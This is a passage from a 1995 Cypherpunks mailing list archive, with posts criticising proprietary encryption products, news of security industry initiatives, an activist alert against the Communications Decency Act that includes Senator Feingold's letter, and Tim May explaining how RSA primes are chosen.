> the use of an encryption algorithm to scramble an image taken of a 
> document.) 
>  
> Also if any of ya'll are familiar with graphic encryption, I am looking 
> for opinions as to its strengths / weaknesses.

The description you give us is meaningless. The strength of an encryption
algorithm must depend only on the algorithm and key used, not on the
data (in your case graphics) being encrypted. It is utterly irrelevant
_what_ is being encrypted, all that matters is _how_ it is being
encrypted. Send us the algorithm and source code and we'll take a look at
it.

And by the way, "proprietary" algorithms are generally junk and should not
be relied upon by security conscious individuals and businesses. Only
algorithms that have undergone extensive peer review should be considered
for use.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHVT7yoZzwIn1bdtAQEUOgGAnyOPIjo4D18AUDNDzXAcqRLXO7vcaRiw
ode3TBA5gLm1FaGPSEk5y5g3VKiVS6ai
=bV6Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 6 Oct 95 04:07:32 PDT
To: cypherpunks@toad.com
Subject: PCMCIA Crypto
Message-ID: <199510061106.MAA16083@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



PCMCIA Establishes Security Card Working Group

The dream of a standardized encryption interface may soon
be realized!


San Jose, Calif., Oct. 5 /PRNewswire/ -- PCMCIA has
formed a new Working Group dedicated to standardizing and
promoting the PC Card as an interface for data encryption
and digital signature applications.

The Working Group was formed to work within the PCMCIA
Technical Committee to help the Association define and
standardize the capabilities and requirements for PC Card
Security Card devices.  The Group's immediate goals are
to define the necessary extensions to the PC Card
Standard that will allow easy identification of Security
Card devices, and to proactively identify other vendors
in the market and solicit their support for standardizing
PC Cards as a security device.

"The formation of this Group represents the formalization
of an industry trend.  A standardized form factor and
interface for security devices is finally an attainable
goal thanks to the widespread acceptance of PC Card
technology," said Gary Visser, a senior software engineer
with Spyrus Communications and Co-Chairperson of the
Working Group.  "It is this high level of host support
that will promote PC Cards as a solution for electronic
banking and commerce."

PC Cards are seen by many experts as an ideal solution
for digital signature and data encryption applications
due to the established base of PC Card slots, and because
most security applications are math intensive and require
the processing power and storage of computers.

The proposal to form the Group was presented to PCMCIA by
Spyrus, Inc. of San Jose, California.  The group will be
co-chaired by Edward Tuggle of IBM Corporation and Visser
of Spyrus, Inc.

Visit PCMCIA's World Wide Web site at
<http://www.pc-card.com>.

Contact:  Greg Barr, Public Relations Coordinator, of
PCMCIA, 408-433-2273, ext. 114, or <gbarr@pcmcia.org>.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 6 Oct 95 09:54:44 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Open Market, Inc. Announcing security products
Message-ID: <199510061654.MAA12549@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Open Market, Inc. Is announcing "free software and services that will
help hundreds of Internet-based businesses and millions of users
protect themselves from potential security breaches."

I don't know any more info.. I'll send more when available.


-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Fri, 6 Oct 95 10:57:22 PDT
To: cypherpunks@toad.com
Subject: Transgenders begin lobbying against ITAR
Message-ID: <Pine.BSD.3.91.951006124333.9747C-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Transgender Lobby Days has come and gone.

I taught transgender persons about PGP and ITAR.
It got a good reception, and they are beginning to use it.

We went to all 535 congressional offices in two days,
and began to get the "transgender lobby block" noticed.
We did get all of the legislative staffers' email addresses,
and will spill the results of this soon, so you can mount
an anti-ITAR campaign of your own.

I concentrated on the media galleries, and began to get the
transgender positions related to the media. We did get lots of
press, and a 20-20 piece coming soon.

They were all virtually uninformed about ITAR or the
Netscape situation. I did my best on ITAR while I was there.

This report is being filed at alt.coffee, a cybercoffeehouse
on Avenue A and 10th Street, in New York City. 

Gotta go this is costing 16.00 an hour to file.

Love Always,

Carol Anne


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 6 Oct 95 10:20:45 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Open Market (more info)
Message-ID: <199510061720.NAA13378@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Basically they are going to set up a web site to act as a clearing
house for security related breaches.

One particular thing they will do is:

1) Hosting a web site where a user with any browser can find out if
   their browser is secure. List security problems associated with
   that browser. "basically a self diagnostic center"

That will be done by tues.


-- 
                Harry Hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Johnson <rickj@microsoft.com>
Date: Fri, 6 Oct 95 13:56:51 PDT
To: perry@piermont.com
Subject: Re: Comments on STT Spec Implementation Details
Message-ID: <9510062200.AA01491@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes....

>My suggestion, which I made when Microsoft made a presentation at the
>IETF meeting in Stockholm and then had the gall to say "oh, no, we
>don't intend to publish an internet draft" is that you publish this as
>an internet draft and try to shepherd it through the IETF's
>standardization process. You will, of course, be savaged, but that is
>in the interests of everyone, including you.

I talked to the two STT folks who were there.  I've also read the 
minutes of that meeting as published by Amir.  Politely, that 
particular meeting and the attempt to form a splintered variety of WGs 
was viewed by the two STT folks attending as a pretty wild affair 
characterized by a lot of 5-10 minute speeches and the slimmest 
directional consensus.  A lot of great discussion, but low odds of 
coalescing into an effort leading to tangible results in a timely 
manner.   That doesn't mean there isn't value in putting proposals into 
the IETF standardization process, and it wasn't the content or intent 
of those people to impart that.  If we had other objectives we wouldn't 
have even bothered to go to Stockholm.

>The belief that companies can make more money by following proprietary
>solutions and imposing them on the world as standards is falling
>away.

Agreed...and not the content or intent of any comments made by the STT 
attendees at that meeting.

>It is in Microsoft's interest that the standard that is adopted
>for commerce be open, publicly discussed at length, and brutally
>critiqued. Losing a bit of control in exchange for actually getting
>something that works out for you and your customers is in your interest.

Also agreed.  Want to pursue discussion in the internet community.  
Keep in mind, though, we're also obligated to deliver solutions to our 
customers in the very near term, and therefore publish the STT spec for 
those who wish to implement and interoperate with the systems we will 
deploy.  Certainly, it's reasonable and rational to want to evolve from 
that point within the guidelines of the IETF.  Based on people's 
reaction to what we have put out for everyone to see, I'd be looking 
for comments from you all as to the most timely and beneficial course 
to pursue.  Looking forward to your input.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:52:13 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


When and where is the monthly Bay Area cypherpunks meeting?

---------------------------------------------------------------------------
Kevin S. Van Horn     | Uncle Sam needs YOU!
vanhorn@architext.com | But not vice versa.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 6 Oct 95 10:49:23 PDT
To: cypherpunks@toad.com (Good Guys)
Subject: Open Market, Inc. Announcing security products
In-Reply-To: <199510061747.NAA13827@cmyk.warwick.com>
Message-ID: <199510061749.NAA13856@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



Here is what they are going to do..

by tues 

1) Hosting a web site where a user with any browser can find out if
   their browser is secure. List security problems associated with
   that browser. "a self diagnostic center"

Using their knowledge base about browsers to create this feature.

shortly thereafter:

2) Creating ref. implementations for the Open Market server; methods
   of verifying what browser you are connecting with and lookup
   security bugs and or proceed with transaction. Make CGI scripts
   available for operators of other servers. Basically letting other
   sites do what they are doing in step 1.

3) Offer a free upgrade program for people who have a server that has
   had a security breach. They can download a known secure server.
   This upgrade is for any commercial server browser that has a known
   breach. E.g., update a netsite server but not a CERN 3.0 server even
   if the CERN operator has hacked it to make it secure.

WWW.openmarket.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David A. Wagner" <dawagner@phoenix.Princeton.EDU>
Date: Fri, 6 Oct 95 16:27:01 PDT
To: cypherpunks@toad.com
Subject: 'net freedom of speech
Message-ID: <199510061914.PAA25802@flagstaff.Princeton.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I thought this might interest some of you here...

Note the email address for Senator Feingold where you can thank him,
without leaving your terminal!


Article: 64508 of comp.org.eff.talk
Path: cnn.Princeton.EDU!udel!news.sprintlink.net!simtel!news.kei.com!news.mathworks.com!panix!not-for-mail
From: shabbir@vtw.org (Shabbir J. Safdar)
Newsgroups: alt.activism,alt.motherjones,alt.politics.datahighway,alt.politics.usa.misc,alt.privacy,alt.society.civil-liberties,alt.wired,comp.org.cpsr.talk,comp.org.eff.talk,talk.politics.libertarian,talk.politics.misc,alt.censorship,misc.legal,alt.fan.rush-limbaugh,alt.sex.senator-exon,alt.society.civil-disob,alt.sex.stories.d,alt.bbs.allsysop
Subject: (ALERT) Sen. Feingold speaks up for free speech; thank him
Date: 1 Oct 1995 01:46:07 -0400
Organization: Voters Telecommunications Watch (email vtw@vtw.org)
Lines: 461
Sender: shabbir@panix.com
Distribution: world
Message-ID: <44l9uv$dmc@panix3.panix.com>
NNTP-Posting-Host: panix3.panix.com
Xref: cnn.Princeton.EDU alt.activism:120876 alt.politics.datahighway:10012 alt.politics.usa.misc:46797 alt.privacy:29041 alt.society.civil-liberty:49866 alt.wired:20952 comp.org.cpsr.talk:6658 comp.org.eff.talk:64508 talk.politics.libertarian:46422 talk.politics.misc:369284 alt.censorship:66917 misc.legal:149492 alt.fan.rush-limbaugh:41505 alt.society.civil-disob:580 alt.sex.stories.d:15167 alt.bbs.allsysop:14512



========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

	Update: -Latest News:
			Feingold releases letter to Committee members
			identifying First Amendment issues with CDA
			legislation.

		-What You Can Do Now:
			Send a letter to Feingold congratulating him
			for speaking up for free speech.

			Put your business or bulletin board on record
			as supporting free speech and opposing censorship
			for cyberspace!

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
			   Oct 1, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
		REDISTRIBUTE ONLY UNTIL November 25, 1995
	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

      Distributed by the Voters Telecommunications Watch (vtw@vtw.org)

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	Letter from Senator Russ Feingold (D-WI) to Committee
	Chronology of the CDA
        For More Information
        List Of Participating Organizations

________________________________________________________________________
THE LATEST NEWS

Many people who have been following the attempts to censor the Internet
may have seen the Senate floor debate.  If you did, you were treated to
the sight of Senators Leahy (D-VT) and Feingold (D-WI) passionately
attempting to explain to 84 members of the Senate exactly just what the
Internet was, and why passing laws against indecency are inappropriate
in this medium.

Both Senators spoke passionately, and for those that understand this
technology, something clicked.  The 16 members that voted against the
censorship legislation will be rewarded by reminders to their voters
about their rational, non-hysterical, positions on free speech at the
end of the year.

In the meantime, we believe that you should congratulate Senator
Feingold on his stand for free speech, and for sticking up for the
net.  Quite often Senator Leahy gets most of the credit for this
position.  Let's be honest, he deserves it because of his long standing
rational approach to our issues.  However it's a big tent, and free
speech can always use another defender. (Directions for contacting
Feingold's office below)

Last week Senator Feingold sent a letter to several committee members
outlining the First Amendment problems with the measures passed by the
Senate (the Communications Decency Act) and the House (the Manager's
Amendment) and asked that these be deleted.  A copy of that letter is
enclosed below, and we thank Senator Feingold's office for making
available an electronic copy (so we didn't have to type it in!).


Remember, send Senator Feingold a thank you.  He's earned it.


[What comes below is unchanged from the last alert]
 
The House and Senate have passed a total of four different pieces of
legislation aimed at dealing with children's access to information on
the Internet.

Each of the four was profiled in BillWatch #13 which you can retrieve
from URL:http://www.vtw.org/billwatch/issue.13.html.  Here are the four
pieces of legislation and a short summary of each of them.

HR1978: "Internet Freedom and Family Empowerment Act" (Cox/Wyden) This
bill takes the approach of encouraging industry to provide parents with
tools to restrict their childrens' access to the net.  It contains no
new criminal provisions.  This approach was affirmed by the House
421-4 on August 4, 1995.  (Yes, that's a landslide)

S314: "The Communications Decency Act" (Exon/Coats) This bill makes
many types of constitutionally-protected speech (including lewd,
lascivious, and indecent speech) criminal when used through a
telecommunications device.  This provision was affirmed by the Senate
84-16 on June 14, 1995.

House amendment to HR1555: "Child Protection, User Empowerment, and
Free Expression in Interactive Media Study Act" (Klink/Leahy) This bill
directs the Department of Justice to study and see if there are places
in current law where existing obscenity laws are unenforcible on computer
networks.  This approach was affirmed by a committee voice vote.

House amendment to HR1555: <unnamed>  This amendment was submitted at
the last minute through the Manager's Mark, a collection of several
amendments to HR1555 that were voted on as a block.  This amendment
takes constitutionally-protected speech and criminalizes it when it is
expressed online.  Most legislators had no idea that they voted on this
last amendment; the summary of the Manager's Mark did not mention
these new criminal provisions.  There was no applicable House vote on
*just this* provision.

The House-Senate conference committee now has the task of deciding
which of these are allowed into the final Telecommunications Deregulation
bill for the last floor vote.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. Send Senator Feingold a letter telling him you appreciate him standing
   up for free speech in cyberspace.  Be polite and check your spelling.

   Most importantly, READ HIS LETTER FIRST before you send mail.  He
   took the time to write it, shouldn't you take the time to read it?

   Email or paper mail are recommended, since they will have the least
   impact on the staff.  Telephone calls are less desirable, but
   certainly appropriate if that is the only way that is convenient
   for you.

   The Senator can be reached at:

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      D WI Feingold, Russell          1-202-224-5323  na
            502 HSOB                    russell_feingold@feingold.senate.gov
            Washington, D.C. 20510


[This is from the last alert.  We are still collecting signons to the
 letter though, and we don't have nearly enough Internet Service Providers.
 -Shabbir]

2. It's crucial that we tell Congress how their decision in the conference
   committee will affect businesses and bulletin boards in cyberspace.
   We're coordinating a letter from Internet businesses and bulletin
   boards to explain to Congress just what these poorly-drafted regulations
   will mean to them.

   Read the electronic business and bulletin board letter below.  You
   can also find it at:

	Gopher:  gopher -p1/vtw/exon gopher.panix.com
	WWW URL: http://www.vtw.org/cdaletter/
	Email  : Send mail to files@vtw.org with "send cdaletter" in the
		 subject line.
	
3. If you work for a business that uses bulletin boards or public networks,
   convince the owners to sign onto the letter.  Companies that should sign
   this include Internet service providers, Web designers (big and small),
   Internet consultants and trainers, Internet restaurants and bars,
   software companies that develop Internet-related software, companies
   that advertise or publish through the Internet or bulletin boards, writers
   who publish through the Internet, and many others!

   If you belong to a bulletin board, ask the sysop if he or she will sign
   onto the letter.

4. Ask the BBS sysop or the business owner to mail in the following
   information to vtw@vtw.org:

	Business name
	Owner or officer name
	Address
	Email address
	Phone number
	Description of business and anything else relevant

   Here's an example:
   
   $ Mail vtw@vtw.org

   My business would like to signon to the business and bbs letter.
   We are:

   	Ed's Xcellent Online Node (EXON)
   	J.J. Exon, Owner
   	2323 Decency Road, Nebraska 10000-0000
   	(402) 555-1212
   	jj@exon.net

   	Ed's Xcellent Online Node is based in Nebraska and provides Internet
   	service to many thoughtful and free-speech loving Nebraskans.
   	We provide Internet access to over 1,500 residents and 400
   	businesses.  We employ 35 full time employees.

   -James
   ^D
   Mail sent!
   $

5. If you don't subscribe to a BBS or have an affiliation with a business
   that uses public networks, but belong to a professional organization
   or an advocacy group, consider sending Congress the ACLU letter included
   below with your local group's name on it.  Simply replace the material
   in parentheses with your own information.

6. Relax!  You just did a lot of good with only email as a tool.  Isn't
   that great?

________________________________________________________________________
LETTER FROM SENATOR RUSS FEINGOLD (D-WI)

[NOTE: This letter was sent to:

	Sen. Larry Pressler
	Sen. Fritz Hollings
	Rep. Thomas Bliley
	Rep. John Dingell
	House Committee on Commerce
	Senate Committee on Commerce, Science, & Technology

 All of these individuals have a hand in the shaping of the conference
 committee process that will define the outcome of the Telecommunications
 Deregulation bill, and therefore, the Internet censorship legislation.

 Each letter was identical, so we have only included one here.

-Shabbir]

Tuesday September 26, 1995


The Honorable Thomas Bliley
Chairman, Committee on Commerce
U.S. House of Representatives
Washington, D.C. 20515

Dear Chairman Bliley,

Soon your Committee will begin Conference deliberations on H.R. 1555
and S.652, telecommunications reform legislation, with members of the
Senate Committee on Commerce, Science and Transportation.  During those
deliberations, I urge you to strike the potentially unconstitutional
provisions regarding on-line indecency contained in both the Senate and
House versions of this legislation.

The Exon-Coats amendment, added to S. 652 on the Senate floor, included
provisions which I believe would violate the First Amendment rights of
Internet users and have a chilling effect on further economic and
technological development of this exciting new form of
telecommunications.  Specifically I have objected to the indecency
provisions of S. 652 for the following reasons:

1)  Indecent speech, unlike obscenity, is protected under the First
    Amendment to the U.S. Constitution;

2)  An outright ban on indecent speech on computer networks is not the
    "least restrictive means" of protecting children from exposure to
    such speech on the Internet. There are a number of existing tools
    available today to allow parents to protect their children from
    materials which they find inappropriate;
 
3)  A ban on indecent speech to minors on the Internet will unnecessarily
    require adults to self censor their communications on the Internet;

4)  Since "indecency" will be defined by community standards, protected
    speech by adults will be diminished to what might be considered decent
    in the most conservative community in the United States and to what
    might be appropriate for very young children; 

5)  The "on-line indecency" provisions will establish different standards
    for the same material that appears in print and on the computer screen.
    Works that are completely legal in the bookstore or on the library shelf
    would be criminal if transmitted over computer networks;

6)  The Supreme Court has ruled that the degree to which content can be
    regulated depends on the characteristics of the media.  The unique
    nature of interactive media must be considered when determining how
    best to protect children.  S. 652 ignores the degree to which users
    have control over the materials to which they are exposed as well as
    the decentralized nature of interactive technology which liken it more
    to print media than broadcast media.

Section 403 of H.R. 1555, known as the Hyde amendment, raises equally
serious concerns with respect to the First Amendment and appears
antithetical to other provisions contained in the House Bill.  The
prohibitions against on-line indecency contained in the Hyde language
will have a similar chilling effect on the on-line communications of
adults.  The Hyde amendment is also inconsistent with the more
market-oriented and less intrusive provisions of Sec. 104 of H.R. 1555,
the On-Line Family Empowerment Act introduced by Congressmen Cox and
Wyden, as adopted by the House.  Section 104 recognizes that First
Amendment protections must apply to on-line communications by
prohibiting FCC content regulation of the Internet.  The Cox/Wyden
provisions also promote the use of existing technology to empower
parents to protect their children from objectionable materials on the
Internet, and encourages on-line service providers to self-police
offensive communications over their private services.

In addition, the Hyde amendment is incompatible with Section 110 of
H.R. 1555, which demands a report by the Department of Justice (DOJ) on
existing criminal obscenity and child pornography statutes and their
applicability to cyber-crime.  Sec. 110 also requires an evaluation of
the technical means available to enable parents to exercise control
over the information that their children receive on the Internet.
Perhaps most significantly, Sec. 110 embraces the application of First
Amendment speech protections to interactive media.  H.R. 1555, while
embracing the principles of restraint with respect to new criminal
sanctions on protected speech and the promotion of a free-market
parental empowerment approach, simultaneously ignores both of those
axioms with the Hyde provision.  By imposing new criminal sanctions on
indecent speech and amending existing criminal statutes, the Hyde
amendment rushes to judgement before the DOJ study has even begun.

Recently, the Senate Judiciary Committee held the first-ever
Congressional hearing on the issue of cyberporn.  Based on the
testimony of the witnesses, which included parents as well as victims
of cyberporn, it became clear that the objectionable communications on
the Internet are already covered by existing criminal statutes.  The
concerns raised at the hearing centered upon trafficking of child
pornography, the proliferation of obscenity, and the solicitation and
victimization of minors via the Internet.  However, those offenses are
already violations of criminal law.  Indeed, recent press accounts
indicate that law enforcement officers are already aggressively
prosecuting on-line users for violations of criminal law relating to
obscenity and child pornography.

It is critical that we use law enforcement resources to prosecute
criminal activity conducted via the Internet and not be distracted by
the issue of indecency which has not been identified as a serious
concern by users or parents.  It was clear, during our recent Senate
Hearing, that the witnesses' concerns about the Internet did not relate
to indecent speech or the so-called "seven dirty words".  It is
incumbent upon Congress to wait for the results of the study required
by H.R. 1555 before embracing overly restrictive, potentially
unnecessary and possibly unconstitutional prohibitions on indecent
speech contained in both versions of telecommunications reform
legislation.

I urge the Conference Committee to reject the Exon/Coats and Hyde
provisions during your deliberations and to maintain the Cox/Wyden
amendment adopted overwhelmingly by the House of Representatives.  If
the United States is to ever fully realize the benefits of interactive
telecommunications technology, we cannot allow the heavy hand of
Congress to unduly interfere with communications on this medium.

Thank you for your consideration of this very important matter. 

Sincerely,




Russell D. Feingold
United States Senator

cc:  Members, Committee on Commerce

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Sep 26, '95	Sen. Russ Feingold urges committee members to drop
		Managers Amendment and the CDA from the Telecommunications
		Deregulation bill
Aug  4, '95	House passes HR1555 which goes into conference with S652.
Aug  4, '95	House votes to attach Managers Amendment (which contains
		new criminal penalties for speech online) to
		Telecommunications Reform bill (HR1555).
Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
	 	Reform bill (HR1555).
Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
		Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.vtw.org/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
	URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
		alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Communication Association * American Council for the Arts *
Arts & Technology Society * Association of Alternative Newsweeklies *
biancaTroll productions * Boston Coalition for Freedom of Expression *
Californians Against Censorship Together * Center For Democracy And
Technology * Centre for Democratic Communications * Center for Public
Representation * Citizen's Voice - New Zealand * Cloud 9 Internet
* Computer Communicators Association * Computel Network Services *
Computer Professionals for Social Responsibility * Cross Connection *
Cyber-Rights Campaign * CyberQueer Lounge * Dutch Digital Citizens'
Movement * ECHO Communications Group, Inc. * Electronic Frontier Canada
* Electronic Frontier Foundation * Electronic Frontier Foundation -
Austin * Electronic Frontiers Australia * Electronic Frontiers Houston
* Electronic Frontiers New Hampshire * Electronic Privacy Information
Center * Feminists For Free Expression * First Amendment Teach-In *
Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising
Services * Friendly Anti-Censorship Taskforce for Students * Hands
Off!  The Net * Human Rights Watch * Inland Book Company * Inner Circle
Technologies, Inc. * Inst. for Global Communications * Internet
On-Ramp, Inc. * Internet Users Consortium * Joint Artists' and Music
Promotions Political Action Committee * The Libertarian Party *
Marijuana Policy Project * Metropolitan Data Networks Ltd. * MindVox *
MN Grassroots Party * National Bicycle Greenway * National Campaign for
Freedom of Expression * National Coalition Against Censorship *
National Gay and Lesbian Task Force * National Public Telecomputing
Network * National Writers Union * Oregon Coast RISC * Panix Public
Access Internet * People for the American Way * Republican Liberty
Caucus * Rock Out Censorship * Society for Electronic Access * The
Thing International BBS Network * The WELL * Voters Telecommunications
Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Oct 95 14:57:34 PDT
To: cypherpunks@toad.com
Subject: Picking Random Primes
Message-ID: <ac9aef322a02100497ac@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:24 PM 10/6/95, Patrick Horgan wrote:

>Given the difficulty of finding primes, how likely do you think it is that
>given one of the well known methods and finding the first 1024 bit prime
>that pops out would give you an effective attack?

What is the "difficulty of finding primes"? They are actually very easy to find.

A few comments:

First, the "1024 bit prime" is misleading. The 320+ decimal digit modulus
used in RSA has two prime factors of roughly 160 digits each.

Second, the process of finding the primes p and q involves avoiding "weak"
moduli, such as where p and q are very close together. To avoid this, a
common situation is for p to be roughly 159 digits and q to be 161 digits.

Third, these are _really, really_ big numbers! There are about 10^158
primes between 10^159 and 10^161, roughly. (The rule of thumb, given by
Sterling's formula, is that about 1% of all 100-digit numbers are prime,
about 0.1% of all 1000-digit numbers are prime, etc.) As there are only
about 10^75 particles in the entire universe, this gives about 10^83 primes
for every particle in the entire universe!

Fourth, the standard way to find the primes p and q is to pick a random
number of the approximate starting size and then iterate up, testing for
primality. As the above approximation shows, one doesn't have to make too
many tests before a number is confirmed to be very likely to be prime. (I
say "very likely" because the most popular primality testing routines have
a very small chance of saying a composite number is prime, when it isn't.
Cf. math books for details on this, and why it is essentially irrelevant to
us.)

Fifth, there are clearly some really good ways to pick a 150 or 160 digit
number to start testing from. For example, a 10-sided die, or a pair of
traditional dice (ignoring 11 and 12) could be rolled 150 times, with the
resulting number used to start the process. Not bloody likely that any
collisions in such a choice process will occur before the heat death of the
universe.

(There are faster ways, using the random sources we so often talk about,
including keyboard poundings,  mouse swirlings, audio input, radioactive
decay, diode noise, etc., but I wanted to make the point with the rolled
die so nobody will ask "Yeah, but what if people picked the same starting
point?" They won't.)

By the way, all of the "entropy" or "randomness" in the p and q primes lies
in the initial seed for the search for the first prime larger than the
seeds, as the algorithm is completely deterministic once the seed has been
picked. (And fast, too.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 6 Oct 95 12:38:54 PDT
To: privsoft@ix.netcom.com (Steve)
Subject: Re: Graphic encryption
In-Reply-To: <199510061517.IAA10725@ix5.ix.netcom.com>
Message-ID: <199510061938.PAA16649@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve O. writes:
> I am currently working for a company that has a graphic encryption 
> product called PrivaSoft. 
[...]
> Also if any of ya'll are familiar with graphic encryption, I am looking 
> for opinions as to its strengths / weaknesses.

Funny you should ask. A week or so ago someone mentioned PrivaSoft's fax
encryption software here. The promotional material we saw mentions two points
about the product which I believe were seen as bad omens by many of us on the 
cypherpunks list. To wit:

(1) PrivaSoft uses a proprietary encryption algorithm

Cryptanalysis is a challenging task. Comparatively little is known about how
to prove, in some formal sense, that any given cryptographic algorithm is
strong. Most people in the field have reached the conclusion that the test of
time is the best true measure of the cryptographic strength of an algorithm.
Until plenty of people have pounded on the algorithm, you can't really have
much confidence about it.

More concretely: If you believe your algorithm is strong, then you have no
reason to fear an expert review, and should in fact welcome it. On the other
hand, if you won't reveal your algorithm, we have little basis for trusting
our confidential data to it. 

(2) PrivaSoft has been approved for export by the U.S. Govt.

As you probably know, the U.S. Government restricts the export of strong
cryptography (using the ITARs), with some notable exceptions for bankers
and authentication-only deployments. PrivaSoft isn't selling strictly to
banks, and attempts to protect confidentiality. Ergo, the government doesn't
think you're using strong cryptography. 

Case in point: the separate U.S. and international versions of Netscape 
Navigator. The exportable version uses the RC4 algorithm (as part of the SSL
protocol) with an effective key length of 40 bits, while the domestic version
uses 128 bits. Some people here made the news a short while ago with a 
concrete demonstration of the inadequacy of the shorter key length. That was
proof-of-concept for an idea already fairly well-accepted in cryptographic
circles.

PrivaSoft looks worse than the int'l. version of Navigator. At
least with the browser, Netscape had levelled with everyone up front and
used a reasonably well-known published algorithm. Thus we had good reason to
believe it provides a non-trivial level of security. The C'punks Key
Cracking Ring showed just what it takes to cross that line. But we have
absolutely _no_ evidence that PrivaSoft does anything hard to break at all.

Bottom line: you have to release the specs. of your algorithm, to a panel
of experts under NDAs or (preferably) to the public, to convince us that 
PrivaSoft offers us real security.

[I highly recommend Schneier's _Applied Cryptography_, 2nd edition due RSN
